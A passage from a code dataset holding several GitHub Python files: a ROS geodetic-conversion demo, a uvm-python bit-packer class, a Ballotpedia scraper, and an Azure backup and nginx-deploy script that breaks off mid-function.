rospy.init_node(\"geotf_python_demo\")\n\n    converter = geotf.GeodeticConverter()\n    # Call roscpp init to use ROS related functions through bindings\n    roscpp_initializer.roscpp_init(\"roscpp_geotf_python_demo\", [])\n    # Add frames manually because ros related functions don't work through bindings atm\n    converter.initFromRosParam()\n\n    # Wait for TF to setup\n    time.sleep(1.0)\n\n    # Initialize ETH mainbuilding based on UTM coordiantes for example.\n    eth_mainbuilding_utm = np.array([465882.064, 5247094.385, 498.217])\n\n    # Output ETH mainbuilding in GPS frame\n    if converter.canConvert(\"UTM\", \"GPS\"):\n        # Python does not support pointers, therefore python wrapper for\n        # convert only takes 3 arguments and returns the output\n        eth_mainbuilding_gps = converter.convert(\"UTM\", eth_mainbuilding_utm, \"GPS\")\n\n        rospy.loginfo(\n            \"ETH Mainbuilding WGS84 = %s\",\n            np.array2string(eth_mainbuilding_gps, precision=15),\n        )\n    else:\n        rospy.logwarn(\"Frames not loaded.\")\n\n    # Output ETH mainbuilding in Swissgrid frame\n    if converter.canConvert(\"UTM\", \"CH1903+\"):\n        eth_mainbuilding_ch = converter.convert(\"UTM\", eth_mainbuilding_utm, \"CH1903+\")\n\n        rospy.loginfo(\n            \"ETH Mainbuilding CH1903+/LV95 = %s\",\n            np.array2string(eth_mainbuilding_ch, precision=9),\n        )\n    else:\n        rospy.logwarn(\"Frames not loaded.\")\n\n    # Output ETH mainbuilding in ENU frame based on LEE terasse\n    if converter.canConvert(\"UTM\", \"ENU_LEE\"):\n        eth_mainbuilding_enu = converter.convert(\"UTM\", eth_mainbuilding_utm, \"ENU_LEE\")\n\n        rospy.loginfo(\n            \"ETH Mainbuilding in ENU Frame based on LEE Terasse = %s\",\n
np.array2string(eth_mainbuilding_enu, precision=15),\n )\n else:\n rospy.logwarn(\"Frames not loaded.\")\n\n rospy.loginfo(\"Open RVIZ and press Enter to continue...\")\n raw_input()\n\n # Example of directly converting TF locations into geo locations\n\n # Here we convert location 0/0/0 in tf frame \"body\" to UTM conversions\n # Note that we do not have to specify explictely how this is converted,\n # as we already configured the equivalence of Geoframe ENU_LEE and\n # tf frame enu in the launch file.\n\n # Python does not support Eigen::Affine therefore we pass a 4x4 Matrix.\n # The output is also returned as 4x4 Matrix\n body_coords = np.identity(4, dtype=\"double\")\n utm_body_coords = converter.convertFromTf(\"body\", body_coords, \"UTM\")\n rospy.loginfo(\n \"UTM coordinates of body origin:\\n%s\", np.array2string(utm_body_coords[0:3, 3])\n )\n\n # Example of Publishing Geolocations as TF frames for visualization.\n\n # Publish TF Frame CornerUTM based on UTM coordinates\n # Note: Overloading Numpy Arrays (Vector & Affine) does not work currently. Therefore the wrapper\n # functions \"publishAffAsTf\" and \"publishVecAsTf\" should be used when using a 4x4 matrix or \n # 3x1 vector, respectively\n utm_building_point = np.identity(4, dtype=\"double\")\n # Translation x,y,z:\n utm_building_point[0,3] = 465727\n utm_building_point[1,3] = 5247291\n utm_building_point[2,3] = 489.619\n print(converter.publishAffAsTf(\"UTM\", utm_building_point, \"CornerUTM\"))\n\n # Publish TF Frame CornerGPS based on UTM coordinates\n gps_building_point = np.identity(4, dtype=\"double\")\n # Translation x,y,z:\n gps_building_point[0,3] = 47.37823\n gps_building_point[1,3] = 8.54616\n gps_building_point[2,3] = 489.619\n converter.publishAffAsTf(\"GPS\", gps_building_point, \"CornerGPS\")\n\n # Publish TF Frame CornerENU based on ENU coordinates using a Vector\n ENU_building_point = np.zeros([3,1])\n # Translation x,y,z:\n ENU_building_point[0] = 14.58\n ENU_building_point[1] = 6.64\n ENU_building_point[2] = 0.0\n converter.publishVecAsTf(\"ENU_LEE\", ENU_building_point, \"CornerENU\")\n\n # Publish TF Frame CornerCH based on CH1903+ coordinates\n CH_building_point = np.identity(4, dtype=\"double\")\n # Translation x,y,z:\n CH_building_point[0,3] = 2683625.9\n CH_building_point[1,3] = 1248088.9\n CH_building_point[2,3] = 442.4\n converter.publishAffAsTf(\"CH1903+\", CH_building_point, \"CornerCH\")\n\n \n\n\n\n rospy.signal_shutdown(True)\n","repo_name":"ethz-asl/geodetic_utils","sub_path":"geotf_python/python/geotf/demo_python_node.py","file_name":"demo_python_node.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","stars":226,"dataset":"github-code","pt":"60"} +{"seq_id":"11282270354","text":"from .uvm_object_globals import *\nfrom .uvm_scope_stack import UVMScopeStack\nfrom .sv import sv\nfrom ..macros.uvm_message_defines import uvm_error, uvm_warning\nfrom typing import List\n\n\nSIZEOF_INT = 32\nMASK_INT = 0xFFFFFFFF\n\n\nclass UVMPacker(object):\n \"\"\"\n The UVMPacker class provides a policy object for packing and unpacking\n uvm_objects. The policies determine how packing and unpacking should be done.\n Packing an object causes the object to be placed into a bit (byte or int)\n array. 
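    A minimal usage sketch (obj stands for any object implementing do_pack; it is not defined in this file): p = UVMPacker(); obj.do_pack(p); raw_bits = p.get_packed_bits().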
If the `uvm_field_* macro are used to implement pack and unpack,\n by default no metadata information is stored for the packing of dynamic\n objects (strings, arrays, class objects).\n \"\"\"\n\n\n bitstream = [] # local bits for (un)pack_bytes\n fabitstream = [] # field automation bits for (un)pack_bytes\n\n # //----------------//\n # // Group: Packing //\n # //----------------//\n\n def __init__(self):\n # //------------------//\n # // Group: Variables //\n # //------------------//\n\n # // Variable: physical\n # //\n # // This bit provides a filtering mechanism for fields.\n # //\n # // The and physical settings allow an object to distinguish between\n # // two different classes of fields. It is up to you, in the\n # // `UVMObject.do_pack` and `UVMObject.do_unpack` methods, to test the\n # // setting of this field if you want to use it as a filter.\n # bit physical = 1\n self.physical = 1\n\n\n # // Variable: abstract\n # //\n # // This bit provides a filtering mechanism for fields.\n # //\n # // The abstract and physical settings allow an object to distinguish between\n # // two different classes of fields. It is up to you, in the\n # // `UVMObject.do_pack` and `UVMObject.do_unpack` routines, to test the\n # // setting of this field if you want to use it as a filter.\n # bit abstract\n self.abstract = 0\n\n\n # // Variable: use_metadata\n # //\n # // This flag indicates whether to encode metadata when packing dynamic data,\n # // or to decode metadata when unpacking. Implementations of `UVMObject.do_pack`\n # // and `UVMObject.do_unpack` should regard this bit when performing their\n # // respective operation. When set, metadata should be encoded as follows:\n # //\n # // - For strings, pack an additional ~null~ byte after the string is packed.\n # //\n # // - For objects, pack 4 bits prior to packing the object itself. Use 4'b0000\n # // to indicate the object being packed is ~null~, otherwise pack 4'b0001 (the\n # // remaining 3 bits are reserved).\n # //\n # // - For queues, dynamic arrays, and associative arrays, pack 32 bits\n # // indicating the size of the array prior to packing individual elements.\n # bit use_metadata\n self.use_metadata = 0\n\n\n # // Variable: big_endian\n # //\n # // This bit determines the order that integral data is packed (using\n # // , , , or ) and how the\n # // data is unpacked from the pack array (using ,\n # // , , or ). 
When the bit is set,\n # // data is associated msb to lsb; otherwise, it is associated lsb to msb.\n # //\n # // The following code illustrates how data can be associated msb to lsb and\n # // lsb to msb:\n # //\n # //| class mydata extends uvm_object;\n # //|\n # //| logic[15:0] value = 'h1234;\n # //|\n # //| function void do_pack (UVMPacker packer);\n # //| packer.pack_field_int(value, 16);\n # //| endfunction\n # //|\n # //| function void do_unpack (UVMPacker packer);\n # //| value = packer.unpack_field_int(16);\n # //| endfunction\n # //| endclass\n # //|\n # //| mydata d = new;\n # //| bit bits[];\n # //|\n # //| initial begin\n # //| d.pack(bits); // 'b0001001000110100\n # //| uvm_default_packer.big_endian = 0;\n # //| d.pack(bits); // 'b0010110001001000\n # //| end\n # bit big_endian = 1\n self.big_endian = 1\n\n # variables and methods primarily for internal use\n self.count = 0 # used to count the number of packed bits\n self.scope = UVMScopeStack()\n self.reverse_order = 0 # flip the bit order around\n self.byte_size = 8 # set up bytesize for endianess\n self.word_size = 16 # set up worksize for endianess\n self.nopack = 0 # only count packable bits\n self.policy = UVM_DEFAULT_POLICY\n self.m_bits = 0x0 # uvm_pack_bitstream_t\n self.m_packed_size = 0\n\n\n # // Function: pack_field\n # //\n # // Packs an integral value (less than or equal to 4096 bits) into the\n # // packed array. ~size~ is the number of bits of ~value~ to pack.\n #\n # extern def pack_field(self,uvm_bitstream_t value, int size):\n def pack_field(self, value, size) -> None:\n # for (int i=0; i is useful for sizes up\n # // to 64 bits.\n def pack_field_int(self, value: int, size: int) -> None:\n if self.big_endian == 1:\n flipped = self.flip_bit_order(value, size)\n self.m_bits |= flipped << self.count\n #self.m_bits[self.count+i] = value[size-1-i]\n else:\n self.m_bits |= value << self.count\n #self.m_bits[self.count+i] = value[i]\n self.count += size\n\n\n # // Function: pack_bits\n # //\n # // Packs bits from upacked array of bits into the pack array.\n # //\n # // See for additional information.\n # extern def pack_bits(self,ref bit value[], input int size = -1):\n\n\n # // Function: pack_bytes\n # //\n # // Packs bits from an upacked array of bytes into the pack array.\n # //\n # // See for additional information.\n # extern def pack_bytes(self,ref byte value[], input int size = -1):\n def pack_bytes(self, value, size=-1) -> None:\n max_size = len(value) * 8\n\n if size < 0:\n size = max_size\n\n if size > max_size:\n uvm_error(\"UVM/BASE/PACKER/BAD_SIZE\",\n sv.sformatf(\"pack_bytes called with size '%0d', which exceeds value size of '%0d'\",\n size, max_size))\n return\n else:\n for i in range(len(value)):\n byte = value[i]\n if self.big_endian == 1:\n byte = self.flip_bit_order(value[len(value)-1-i], 8)\n self.m_bits |= byte << self.count\n self.count += 8\n\n\n # // Function: pack_ints\n # //\n # // Packs bits from an unpacked array of ints into the pack array.\n # //\n # // The bits are appended to the internal pack array.\n # // This method allows for fields of arbitrary length to be\n # // passed in, using the SystemVerilog ~stream~ operator.\n # //\n # // For example\n # // | bit[511:0] my_field;\n # // | begin\n # // | int my_stream[];\n # // | { << int {my_stream}} = my_field;\n # // | packer.pack_ints(my_stream);\n # // | end\n # //\n # // When appending the stream to the internal pack array, the packer will obey\n # // the value of (appending the array from MSB to LSB if set).\n # //\n # // An 
optional ~size~ parameter is provided, which defaults to '-1'. If set\n # // to any value greater than '-1' (including 0), then the packer will use\n # // the size as the number of bits to pack, otherwise the packer will simply\n # // pack the entire stream.\n # //\n # // An error will be asserted if the ~size~ has been specified, and exceeds the\n # // size of the source array.\n # //\n # extern def pack_ints(self,ref int value[], input int size = -1):\n def pack_ints(self, value, size=-1) -> None:\n max_size = len(value) * SIZEOF_INT\n\n if size < 0:\n size = max_size\n\n if size > max_size:\n uvm_error(\"UVM/BASE/PACKER/BAD_SIZE\",\n sv.sformatf(\"pack_ints called with size '%0d', which exceeds value size of '%0d'\",\n size, max_size))\n return\n else:\n for i in range(len(value)):\n int_num = value[i]\n if self.big_endian == 1:\n int_num = self.flip_bit_order(value[len(value)-1-i],\n SIZEOF_INT)\n self.m_bits |= int_num << self.count\n self.count += SIZEOF_INT\n\n\n # // Function: pack_string\n # //\n # // Packs a string value into the pack array.\n # //\n # // When the metadata flag is set, the packed string is terminated by a ~null~\n # // character to mark the end of the string.\n # //\n # // This is useful for mixed language communication where unpacking may occur\n # // outside of SystemVerilog UVM.\n #\n # extern def pack_string(self,string value):\n def pack_string(self, value) -> None:\n bytearr = value.encode()\n\n size = 8 * len(bytearr)\n bits = int(bytearr.hex(), 16)\n if self.big_endian == 1:\n bits = self.flip_bit_order(bits, -1)\n self.m_bits |= bits << self.count\n self.count += size\n if self.use_metadata == 1:\n pass\n # TODO self.m_bits |= 0 << self.count\n # byte b\n # foreach (value[index]):\n # if(self.big_endian == 0)\n # self.m_bits[count +: 8] = value[index]\n # else begin\n # b = value[index]\n # for(int i=0; i<8; ++i)\n # self.m_bits[count+i] = b[7-i]\n # end\n # count += 8\n # end\n # if(use_metadata == 1):\n # self.m_bits[count +: 8] = 0\n # count += 8\n # end\n #endfunction\n\n\n # // Function: pack_time\n # //\n # // Packs a time ~value~ as 64 bits into the pack array.\n #\n # extern def pack_time(self,time value):;\n\n\n # // Function: pack_real\n # //\n # // Packs a real ~value~ as 64 bits into the pack array.\n # //\n # // The real ~value~ is converted to a 6-bit scalar value using the function\n # // $real2bits before it is packed into the array.\n #\n # extern def pack_real(self,real value):\n\n\n # // Function: pack_object\n # //\n # // Packs an object value into the pack array.\n # //\n # // A 4-bit header is inserted ahead of the string to indicate the number of\n # // bits that was packed. 
If a ~null~ object was packed, then this header will\n # // be 0.\n # //\n # // This is useful for mixed-language communication where unpacking may occur\n # // outside of UVM.\n #\n # extern def pack_object(self,uvm_object value):\n def pack_object(self, value) -> None:\n if value in value._m_uvm_status_container.cycle_check:\n uvm_warning(\"CYCFND\", sv.sformatf(\"Cycle detected for object @%0d during pack\",\n value.get_inst_id()))\n return\n\n value._m_uvm_status_container.cycle_check[value] = 1\n\n if((self.policy != UVM_REFERENCE) and value is not None):\n if self.use_metadata == 1:\n pass\n #self.m_bits[count +: 4] = 1\n #count += 4; // to better debug when display packed bits in hexadecimal\n\n self.scope.down(value.get_name())\n value._m_uvm_field_automation(None, UVM_PACK,\"\")\n value.do_pack(self)\n self.scope.up()\n elif self.use_metadata == 1:\n pass\n #self.m_bits[count +: 4] = 0\n #count += 4\n del value._m_uvm_status_container.cycle_check[value]\n\n\n # //------------------//\n # // Group: Unpacking //\n # //------------------//\n\n # // Function: is_null\n # //\n # // This method is used during unpack operations to peek at the next 4-bit\n # // chunk of the pack data and determine if it is 0.\n # //\n # // If the next four bits are all 0, then the return value is a 1; otherwise\n # // it is 0.\n # //\n # // This is useful when unpacking objects, to decide whether a new object\n # // needs to be allocated or not.\n #\n # extern def is_null(self):\n\n\n # // Function: unpack_field\n # //\n # // Unpacks bits from the pack array and returns the bit-stream that was\n # // unpacked. ~size~ is the number of bits to unpack; the maximum is 4096 bits.\n #\n # extern def unpack_field(self,int size):\n def unpack_field(self, size):\n return self.unpack_field_int(size)\n # unpack_field = 0b0\n # if (self.enough_bits(size,\"integral\")):\n # count += size\n # for (int i=0; i int:\n unpack_field_int = 0x0\n count_before = self.count\n if self.enough_bits(size,\"integral\"):\n self.count += size\n for i in range(size):\n if self.big_endian:\n bit_sel = self.count-i-1\n bit_sel = (1 << bit_sel)\n unpack_field_int |= self.m_bits & bit_sel\n else:\n bit_sel = self.count-size+i\n bit_sel = (1 << bit_sel)\n unpack_field_int |= self.m_bits & bit_sel\n unpack_field_int >>= count_before\n if self.big_endian:\n unpack_field_int = self.flip_bit_order(unpack_field_int, size)\n return unpack_field_int\n\n\n # // Function: unpack_bits\n # //\n # // Unpacks bits from the pack array into an unpacked array of bits.\n # //\n # extern def unpack_bits(self,ref bit value[], input int size = -1):\n #\n\n # // Function: unpack_bytes\n # //\n # // Unpacks bits from the pack array into an unpacked array of bytes.\n # //\n # extern def unpack_bytes(self,ref byte value[], input int size = -1):\n def unpack_bytes(self, value, size=-1):\n max_size = len(value) * 8\n if size < 0:\n size = max_size\n\n if size > max_size:\n uvm_error(\"UVM/BASE/PACKER/BAD_SIZE\",\n sv.sformatf(\"unpack_bytes called with size '%0d', which exceeds value size of '%0d'\",\n size, len(value)))\n return []\n else:\n if self.enough_bits(size, \"integral\"):\n self.count += size\n for b in range(len(value)):\n byte = (self.m_bits >> b * 8) & 0xFF\n if self.big_endian == 1:\n byte = self.flip_bit_order(byte, 8)\n value[len(value)-1-b] = byte\n else:\n value[b] = byte\n return value\n\n\n # // Function: unpack_ints\n # //\n # // Unpacks bits from the pack array into an unpacked array of ints.\n # //\n # // The unpacked array is unpacked from 
the internal pack array.\n # // This method allows for fields of arbitrary length to be\n # // passed in without expanding into a pre-defined integral type first.\n # //\n # // For example\n # // | bit[511:0] my_field;\n # // | begin\n # // | int my_stream[] = new[16]; // 512/32 = 16\n # // | packer.unpack_ints(my_stream);\n # // | my_field = {<<{my_stream}};\n # // | end\n # //\n # // When unpacking the stream from the internal pack array, the packer will obey\n # // the value of (unpacking the array from MSB to LSB if set).\n # //\n # // An optional ~size~ parameter is provided, which defaults to '-1'. If set\n # // to any value greater than '-1' (including 0), then the packer will use\n # // the size as the number of bits to unpack, otherwise the packer will simply\n # // unpack the entire stream.\n # //\n # // An error will be asserted if the ~size~ has been specified, and\n # // exceeds the size of the target array.\n # //\n # extern def unpack_ints(self,ref int value[], input int size = -1):\n def unpack_ints(self, value, size=-1):\n max_size = len(value) * SIZEOF_INT\n if size < 0:\n size = max_size\n\n if size > max_size:\n uvm_error(\"UVM/BASE/PACKER/BAD_SIZE\",\n sv.sformatf(\"unpack_ints called with size '%0d', which exceeds value size of '%0d'\",\n size, len(value)))\n return\n else:\n if self.enough_bits(size, \"integral\"):\n self.count += size\n for i in range(len(value)):\n int_num = (self.m_bits >> i * SIZEOF_INT) & 0xFFFFFFFF\n if self.big_endian == 1:\n int_num = self.flip_bit_order(int_num, SIZEOF_INT)\n value[len(value)-1-i] = int_num\n else:\n value[i] = int_num\n return value\n\n\n # // Function: unpack_string\n # //\n # // Unpacks a string.\n # //\n # // num_chars bytes are unpacked into a string. If num_chars is -1 then\n # // unpacking stops on at the first ~null~ character that is encountered.\n #// If num_chars is not -1, then the user only wants to unpack a\n #// specific number of bytes into the string.\n def unpack_string(self, num_chars=-1):\n # byte b\n i = 0\n is_null_term = 0 # Assumes a ~None~ terminated string\n # int i; i=0\n if num_chars == -1:\n is_null_term = 1\n\n #val_to_decode = 0x0\n # We'll use bytearray to decode this, so need to find the num of bytes\n\n byte_arr = bytearray()\n #unpack_string = 0\n curr_byte = (self.m_bits >> self.count) & 0xFF\n while (self.enough_bits(8,\"string\", is_error=False) and\n ((curr_byte != 0) or (is_null_term == 0)) and\n ((i < num_chars) or (is_null_term == 1))):\n # silly, because cannot append byte/char to string\n #unpack_string = unpack_string + \" \"\n #if self.big_endian == 0:\n # unpack_string[i] = self.m_bits[count +: 8]\n #else:\n # for(int j=0; j<8; ++j)\n # b[7-j] = self.m_bits[count+j]\n # unpack_string[i] = b\n i += 1\n byte_arr.insert(0, curr_byte)\n self.count += 8\n curr_byte = (self.m_bits >> self.count) & 0xFF\n if self.enough_bits(8,\"string\", is_error=False):\n self.count += 8\n return byte_arr.decode()\n #return unpack_string\n\n\n # // Function: unpack_time\n # //\n # // Unpacks the next 64 bits of the pack array and places them into a\n # // time variable.\n #\n # extern def unpack_time(self):;\n\n\n\n # // Function: unpack_real\n # //\n # // Unpacks the next 64 bits of the pack array and places them into a\n # // real variable.\n # //\n # // The 64 bits of packed data are converted to a real using the $bits2real\n # // system function.\n #\n # extern def unpack_real(self):\n\n\n\n # // Function: unpack_object\n # //\n # // Unpacks an object and stores the result into ~value~.\n # //\n 
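    # // A typical call sequence, shown as a sketch (SomeObject is a placeholder, not defined here): target = SomeObject(); packer.unpack_object(target); the packer then fills target's fields in place via target.do_unpack.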
# // ~value~ must be an allocated object that has enough space for the data\n # // being unpacked. The first four bits of packed data are used to determine\n # // if a ~null~ object was packed into the array.\n # //\n # // The function can be used to peek at the next four bits in\n # // the pack array before calling this method.\n #\n # extern def unpack_object(self,uvm_object value):\n def unpack_object(self, value):\n is_non_null = 1\n\n if value in value._m_uvm_status_container.cycle_check:\n uvm_warning(\"CYCFND\", sv.sformatf(\n \"Cycle detected for object @%0d during unpack\", value.get_inst_id()))\n return\n value._m_uvm_status_container.cycle_check[value] = 1\n\n if self.use_metadata == 1:\n is_non_null = get_bits(self.m_bits, self.count, 4) != 0 # [count +: 4]\n self.count += 4\n\n # NOTE- policy is a ~pack~ policy, not unpack policy;\n # and you can't pack an object by REFERENCE\n if value is not None:\n if is_non_null > 0:\n self.scope.down(value.get_name())\n value._m_uvm_field_automation(None, UVM_UNPACK,\"\")\n value.do_unpack(self)\n self.scope.up()\n else:\n pass\n # TODO: help do_unpack know whether unpacked result would be null\n # to avoid new'ing unnecessarily;\n # this does not nullify argument; need to pass obj by ref\n elif ((is_non_null != 0) and (value is None)):\n uvm_error(\"UNPOBJ\",\"cannot unpack into None object\")\n del value._m_uvm_status_container.cycle_check[value]\n\n\n # // Function: get_packed_size\n # //\n # // Returns the number of bits that were packed.\n def get_packed_size(self) -> int:\n return self.m_packed_size\n\n\n # extern def unpack_object_ext(self,inout uvm_object value):\n\n\n # extern def get_packed_bits(self):\n def get_packed_bits(self) -> int:\n return self.m_bits\n\n\n # extern def bit unsigned get_bit (self,int unsigned index):\n def get_bit(self, index) -> int:\n if index >= self.m_packed_size:\n self.index_error(index, \"bit\",1)\n return (self.m_bits >> index) & 0x1\n\n\n # extern def byte unsigned get_byte (self,int unsigned index):\n # extern def int unsigned get_int (self,int unsigned index):\n\n # extern def get_bits(self,ref bit unsigned bits[]):\n def get_bits(self) -> int:\n return self.m_bits\n\n # extern def get_bytes(self,ref byte unsigned bytes[]):\n def get_bytes(self) -> List[int]:\n sz = 0\n v = 0x00\n sz = int((self.m_packed_size+7) / 8)\n bytes = [0] * sz\n for i in range(sz):\n if (i != sz-1 or (self.m_packed_size % 8) == 0):\n v = (self.m_bits >> (i * 8)) & 0xFF\n else:\n sel = (0xFF >> (8-(self.m_packed_size % 8)))\n v = (self.m_bits >> (i * 8)) & sel\n if self.big_endian:\n v = self.flip_bit_order(v, 8)\n bytes[i] = v\n return bytes\n\n\n # extern def get_ints(self):\n def get_ints(self) -> List[int]:\n sz = 0\n v = 0\n sz = int((self.m_packed_size+31) / SIZEOF_INT)\n ints = [0] * sz\n for i in range(sz):\n if i != sz-1 or (self.m_packed_size % 32) == 0:\n v = (self.m_bits >> (i * SIZEOF_INT)) & 0xFFFFFFFF\n else:\n sel = (0xFFFFFFFF >> (32-(self.m_packed_size % 32)))\n v = (self.m_bits >> (i * SIZEOF_INT)) & sel\n if self.big_endian:\n v = self.flip_bit_order(v, SIZEOF_INT)\n ints[i] = v\n return ints\n\n\n # extern def put_bits(self,ref bit unsigned bitstream[]):\n def put_bits(self, bitstream):\n # int bit_size\n # bit_size = bitstream.size()\n #\n # if(self.big_endian)\n # for (int i=bit_size-1;i>=0;i--)\n # self.m_bits[i] = bitstream[i]\n # else\n # for (int i=0;i int:\n flipped = 0x0\n num_bits = len(bin(value)) - 2\n while value:\n flipped = (flipped << 1) + (value & 0x1) # Choose LSB\n value = value >> 
1\n # For packing, need to add some right-padding\n if size != -1:\n rem_bits = size - num_bits\n if rem_bits >= 0:\n flipped <<= rem_bits\n else:\n raise Exception(\"rem_bits negative. size: {}, value: {}\".format(\n size, hex(value)))\n return flipped\n\n\n#//------------------------------------------------------------------------------\n#// IMPLEMENTATION\n#//------------------------------------------------------------------------------\n#\n#// NOTE- max size limited to BITSTREAM bits parameter (default: 4096)\n#\n#\n#// put_bytes\n#// ---------\n#\n#def void UVMPacker::put_bytes (self,ref byte unsigned bytestream []):\n#\n# int byte_size\n# int index\n# byte unsigned b\n#\n# byte_size = bytestream.size()\n# index = 0\n# for (int i=0;i= (m_packed_size+7)/8)\n# index_error(index, \"byte\",8)\n# return self.m_bits[index*8 +: 8]\n#endfunction\n#\n#\n#// get_int\n#// -------\n#\n#def int unsigned UVMPacker::get_int(self,int unsigned index):\n# if (index >= (m_packed_size+31)/32)\n# index_error(index, \"int\",32)\n# return self.m_bits[(index*32) +: 32]\n#endfunction\n#\n#\n#// PACK\n#\n#\n#\n#\n#// pack_real\n#// ---------\n#\n#def void UVMPacker::pack_real(self,real value):\n# pack_field_int($realtobits(value), 64)\n#endfunction\n#\n#\n#// pack_time\n#// ---------\n#\n#def void UVMPacker::pack_time(self,time value):\n# pack_field_int(value, 64)\n# //m_bits[count +: 64] = value; this overwrites endian adjustments\n#endfunction\n#\n#\n#\n#\n#\n#// pack_bits\n#// -----------------\n#\n#def void UVMPacker::pack_bits(self,ref bit value[], input int size = -1):\n# if (size < 0)\n# size = len(value)\n#\n# if (size > len(value)):\n# uvm_error(\"UVM/BASE/PACKER/BAD_SIZE\",\n# sv.sformatf(\"pack_bits called with size '%0d', which exceeds len(value) of '%0d'\",\n# size,\n# len(value)))\n# return\n# end\n#\n# for (int i=0; i len(value)):\n# uvm_error(\"UVM/BASE/PACKER/BAD_SIZE\",\n# sv.sformatf(\"unpack_bits called with size '%0d', which exceeds len(value) of '%0d'\",\n# size,\n# len(value)))\n# return\n# end\n#\n# if (self.enough_bits(size, \"integral\")):\n# count += size\n# for (int i=0; i> (i-idx))\n idx += 1\n return val\n","repo_name":"tpoikela/uvm-python","sub_path":"src/uvm/base/uvm_packer.py","file_name":"uvm_packer.py","file_ext":"py","file_size_in_byte":30663,"program_lang":"python","lang":"en","doc_type":"code","stars":205,"dataset":"github-code","pt":"60"} +{"seq_id":"12074515702","text":"import urllib2\nimport urllib\nimport os\nimport re\nimport cache\nimport encode\nimport lxml.html\nimport lxml\nimport wiki\n\n\"\"\" \nthe results is a dictionary :\nnames\nlinks\nwp\n\n\"\"\" \n\ndef parse_ballotwiki_page(x,reps,obj) :\n d = cache.cachewp ('http://ballotpedia.org%s?printable=yes' % x)\n html = lxml.html.document_fromstring( d )\n return wiki.parse_wiki_page_links(html,reps,obj)\n \ndef parse(url) :\n reps = {\n 'wp': {},\n 'names': {},\n 'links': {},\n }\n d = cache.cachewp (url)\n myparser = lxml.etree.HTMLParser(encoding=\"utf-8\")\n html = lxml.etree.HTML(d, parser=myparser)\n for r in html.xpath(\"//ol/li\") :\n for l in r.xpath(\"a\"):\n f_name_link = l.get(\"href\")\n f_name_element = l.text\n\n obj = {\n 'links' : {\n 'homepage' : {}\n },\n 'link' : f_name_link,\n 'name' : f_name_element\n }\n link = re.search(\"/([^\\/]+)$\",f_name_link).group(1) \n link = urllib.unquote(link)\n link = encode.decode(link)\n\n \"\"\" we are going to collect all the links and point to the object \"\"\" \n# print link, f_name_element, f_name_link \n reps['wp'][link]= 
parse_ballotwiki_page(f_name_link,reps,obj)\n reps['names'][f_name_element]= obj\n\n return reps\n\n\n","repo_name":"h4ck3rm1k3/rootstrikers-wikipedia","sub_path":"Ballotpedia.py","file_name":"Ballotpedia.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"42004244037","text":"#!/usr/bin/env python\n\n\"\"\"Backup and deploy script\"\"\"\n\nimport os\nimport sys\nimport datetime\nimport glob\nimport shutil\n\nfrom fabric.api import run, env, put, sudo\n\nimport azure.common\nfrom azure.storage.file import FileService\nfrom azure.storage.blob import BlockBlobService\n\n\ndef get_backup(gw_account_name, gw_account_key, gw_account_share, backup_local_path):\n\n \"\"\"Upload directories and files from $account_name to local $backup_local_path using Azure FileService\"\"\"\n\n print('\\nRunning get_backup from the {} and file share {} to local path {}.\\n'.format(gw_account_name, gw_account_share, backup_local_path))\n\n file_service = FileService(account_name=gw_account_name, account_key=gw_account_key)\n share_dirs_list = file_service.list_directories_and_files(gw_account_share)\n\n for share_dir_name in share_dirs_list:\n\n backup_local_dir = os.path.join(backup_local_path, share_dir_name.name)\n\n if not os.path.isdir(backup_local_dir):\n print('Local backup directory {} not found, creating...'.format(backup_local_dir))\n os.makedirs(backup_local_dir)\n\n share_files_list = file_service.list_directories_and_files(gw_account_share, share_dir_name.name)\n for share_file in share_files_list:\n try:\n print('Getting file: {}'.format(os.path.join('/', share_dir_name.name, share_file.name)))\n # example:\n # file_service.get_file_to_path('gwdevproxydata', 'datanginx-conf.d', 'jm-gw-proxy-dev.domain.tld.conf', '/tmp/jm-gw-proxy-dev.domain.tld.conf-out')\n file_service.get_file_to_path(gw_account_share, share_dir_name.name, share_file.name, os.path.join(backup_local_dir, share_file.name))\n # to pass /data/datahtml/.well-known dir on master host\n except azure.common.AzureMissingResourceHttpError as e:\n print('\\nWARNING: {}\\n'.format(e))\n\n\ndef push_backup(bac_account_name, bac_account_key, bac_container_name, backup_local_path):\n\n \"\"\"Upload directories and files from $backup_local_path to account_name using Azure BlockBlobService\"\"\"\n\n print('\\nRunning push_backup from local path {} to the {} and container {}\\n'.format(backup_local_path, bac_account_name, bac_container_name))\n\n now = datetime.datetime.today().strftime('%Y_%m_%d_%H_%M')\n\n for root, dirs, files in os.walk(backup_local_path, topdown=True):\n for name in dirs:\n path = os.path.join(root, name)\n for filename in os.listdir(path):\n fullpath = os.path.join(path, filename)\n\n block_blob_service = BlockBlobService(account_name=bac_account_name, account_key=bac_account_key)\n # example\n # block_blob_service.create_blob_from_path(container_name, 'datanginx-conf.d/jm-gw-proxy-production.domain.tld.conf', '/tmp/datanginx-conf.d/jm-gw-proxy-production.domain.tld.conf')\n print('Uploading {} as {}'.format(fullpath, os.path.join(now, name, filename)))\n block_blob_service.create_blob_from_path(bac_container_name, os.path.join(now, name, filename), fullpath)\n\n\ndef update_datanginxconfd(gw_account_name, gw_account_key, gw_account_share):\n\n \"\"\"Upload data from cloned repo to the GW Storage account into the datanginx-conf.d directory with overwriting\"\"\"\n\n print('\\nRunning update_confd to the {} and file share {} 
to the path datanginx-conf.d.\\n'.format(gw_account_name, gw_account_share))\n\n file_service = FileService(account_name=gw_account_name, account_key=gw_account_key)\n\n configs = glob.glob('*.conf')\n for config in configs:\n print('Uploading config: {}'.format(config))\n file_service.create_file_from_path(gw_account_share, 'datanginx-conf.d', config, config)\n\n\ndef cleanup_backup_local_path(backup_local_path):\n\n print('Cleaning up local {} directory....'.format(backup_local_path))\n shutil.rmtree(backup_local_path)\n\n\ndef nginx_reload(gw_proxy_host, gw_proxy_user, gw_proxy_key, gw_proxy_ports):\n\n \"\"\"Will connect to the Master and Secondary host to execute \"nginx -t\" before reload\"\"\"\n\n for port in gw_proxy_ports:\n env.host_string = gw_proxy_host + ':' + str(port)\n env.key_filename = [os.path.join('.ssh', gw_proxy_key)]\n env.user = gw_proxy_user\n\n validate_status = sudo('nginx -t')\n\n if validate_status.return_code == 0:\n print('OK: NGINX configs validated\\n')\n else:\n print('ERROR: can\\'t validate NGINX\\n')\n exit(1)\n\n reload_status = sudo('systemctl reload nginx.service')\n\n if reload_status.return_code == 0:\n print('\\nOK: NGINX reload complete\\n')\n else:\n 